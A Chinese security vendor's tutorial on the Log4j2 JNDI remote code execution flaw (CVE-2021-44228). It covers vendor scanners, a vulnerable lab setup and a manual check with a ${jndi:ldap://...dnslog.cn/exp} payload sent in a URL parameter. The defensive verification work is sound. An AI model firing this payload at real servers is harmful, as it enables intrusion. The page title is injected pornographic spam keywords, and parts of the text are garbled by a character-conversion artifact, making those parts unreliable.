五月婷婷婷之激情综合-亚洲国产香蕉视频欧美-国产蜜臀av在线一区尤物-日韩精品乱码久久久久

數(shù)字經(jīng)濟(jì)的安全基石

產(chǎn)品技術(shù)

首頁(yè) > 資源中心 > 知識(shí)中心 > 產(chǎn)品技術(shù) > 正文

玩轉(zhuǎn)Log4j2遠(yuǎn)程代碼執(zhí)行漏洞,安恒明鑒保姆級(jí)教程


2021.12.10,一個(gè)平平無(wú)奇的脫發(fā)日,突然老板來(lái)了消息。


工具發(fā)現(xiàn)

明鑒漏洞掃描系統(tǒng)

安恒明鑒漏掃產(chǎn)品第一時(shí)間已具備對(duì)該漏洞的掃描與檢測(cè)能力,根據(jù)產(chǎn)品通知,將網(wǎng)站掃描策略升級(jí)至V1.3.582.534版本,開(kāi)始做掃描任務(wù)。


1、新建策略模板,單獨(dú)選擇Apache Log4j 2遠(yuǎn)程代碼執(zhí)行掃描策略


2、新建掃描任務(wù),選擇對(duì)應(yīng)策略模板并提交任務(wù)。


3、由于只針對(duì)這一個(gè)漏洞做應(yīng)急掃描,任務(wù)很快執(zhí)行完成,查看掃描結(jié)果,成功發(fā)現(xiàn)漏洞!


明鑒Web應(yīng)用弱點(diǎn)掃描器

將策略庫(kù)版本升級(jí)至V6.1.117版本,即可具備Apache Log4j 2遠(yuǎn)程代碼執(zhí)行(CVE-2021-44228)漏洞發(fā)現(xiàn)能力。


1、新建任務(wù)填寫掃描目標(biāo)。


2、選擇自定義策略,勾選Apache Log4j遠(yuǎn)程代碼執(zhí)行(CVE-2021-44228)掃描策略。


3、待任務(wù)執(zhí)行完成后,查看掃描結(jié)果。依舊發(fā)現(xiàn),從工具中導(dǎo)出報(bào)告交給領(lǐng)導(dǎo)就能交差了!


順利完成任務(wù),不過(guò)這個(gè)波及廣泛的Apache Log4j2 遠(yuǎn)程代碼執(zhí)行漏洞到底是啥,作為小白有必要一探究竟。


環(huán)境搭建

服務(wù)器環(huán)境

操作系統(tǒng):centos7.7

JAVA環(huán)境:JDK1.8

Centos7.7安裝教程:

https://www.cnblogs.com/weihengblogs/p/13724167.html

JAVA環(huán)境部署教程:

https://www.cnblogs.com/stulzq/p/9286878.html


漏洞環(huán)境獲取

獲取地址:

https://pan.baidu.com/s/12ftEpSFnOjjITGlWNbl84w

提取碼:r5pk?


后臺(tái)啟用Log4j2漏洞環(huán)境


nohupjava-jarspringboot-log4j2-demo-0.0.1-SNAPSHOT.jar&


訪問(wèn)環(huán)境

漏洞環(huán)境的Web服務(wù)監(jiān)聽(tīng)8082端口,param參數(shù)會(huì)調(diào)用log4j。這時(shí)請(qǐng)求一下該參數(shù),確認(rèn)環(huán)境是否正常。

http://X.X.X.X:8082/test?param=1


漏洞驗(yàn)證

通過(guò)dnslog.cn獲取dnslog子域


構(gòu)造payload


${jndi:ldap://fj537p.dnslog.cn/exp}


帶入payload請(qǐng)求驗(yàn)證dns訪問(wèn)


http://X.X.X.X:8082/test?param=${jndi:ldap://fj537p.dnslog.cn/exp}


查看dnslog回顯

看到這個(gè)回顯就證明漏洞存在了。如果沒(méi)有工具借助,按此方法來(lái)也能夠驗(yàn)證。但若想快速便捷地大批量進(jìn)行驗(yàn)證,還是需要購(gòu)買專業(yè)漏洞掃描類產(chǎn)品,畢竟下一個(gè)高危漏洞爆發(fā)咱也不知道好不好手工驗(yàn)證。

與專家在線溝通, 免費(fèi)獲取專業(yè)解決方案

線上咨詢
聯(lián)系我們

咨詢電話:400-6059-110

產(chǎn)品試用

即刻預(yù)約免費(fèi)試用,我們將在24小時(shí)內(nèi)聯(lián)系您

微信咨詢